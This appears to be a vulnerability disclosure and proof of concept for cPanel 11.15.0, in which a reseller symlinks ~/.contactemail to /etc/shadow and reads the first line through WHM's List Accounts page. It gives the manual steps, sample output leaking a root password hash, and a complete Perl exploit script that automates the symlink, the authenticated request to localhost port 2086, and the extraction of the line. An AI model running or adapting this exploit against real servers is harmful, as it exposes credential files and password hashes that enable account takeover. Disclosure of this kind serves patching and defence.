cPanel 11.15.0-RELEASE_17853 - view first line of any file



DESCRIPTION


Resellers could view the first line of any file on the box. This was done by renaming or removing ~/.contactemail, then symlinking that file to the file you wanted to view the first line from. Then the reseller could log into WHM, click "List Accounts", and see the first line of the file in the Contact Email field.


Step 1:

[user@host ~]$ ln -s /etc/shadow /home/user/.contactemail


Step 2:

GET /scripts2/listaccts?viewall=1 HTTP/1.0



IMPACT


Resellers could obtain root's password hash from /etc/shadow or /etc/exim/authtab.


[user@host ~]$ ./11.15.0-RELEASE_17853-view_first_line_of_any_file.pl
root:$1$BxAWmn63$J4Iyx.3Ki6wtUo1NS7A2e/:14457:0:99999:7:::


#!/usr/bin/perl

####################################################
#
# 11.15.0-RELEASE_17853
#
# View the first line of a file, such as /etc/shadow
# Works via /home/user/.contactemail
#
####################################################

use strict;
use warnings;
use MIME::Base64;
use IO::Socket::INET;

my $username = '';
my $password = '';

my $creds = encode_base64("$username:$password");

my $contactemail    = "/home/$ENV{'USER'}/.contactemail";
my $contactemailbak = $contactemail . 'bak';
my $etcshadow       = '/etc/shadow';

if ( -e $contactemail ) {
    rename $contactemail, $contactemailbak;
}

symlink $etcshadow, $contactemail;

my $request = "GET /scripts2/listaccts?viewall=1 HTTP/1.0\r\n";
$request   .= "Authorization: Basic $creds\r\n\r\n";

my $sock = IO::Socket::INET->new(
    PeerAddr => '127.0.0.1',
    PeerPort => '2086',
    Proto    => 'tcp',
    Timeout  => '3',
) or die "Unable to connect to localhost on port 2086\n";

print $sock $request;
read $sock, my $buffer, 50_000;
close $sock;

my @buffer = split ( /\n/, $buffer );
for my $line ( @buffer )
{
    if ( $line =~ /mailto:root/ )
    {
        $line =~ s/.*mailto://g;
        $line =~ s/\".*//g;
        print "$line\n";
    }
}

if ( -e $contactemailbak ) {
    rename $contactemailbak, $contactemail;
}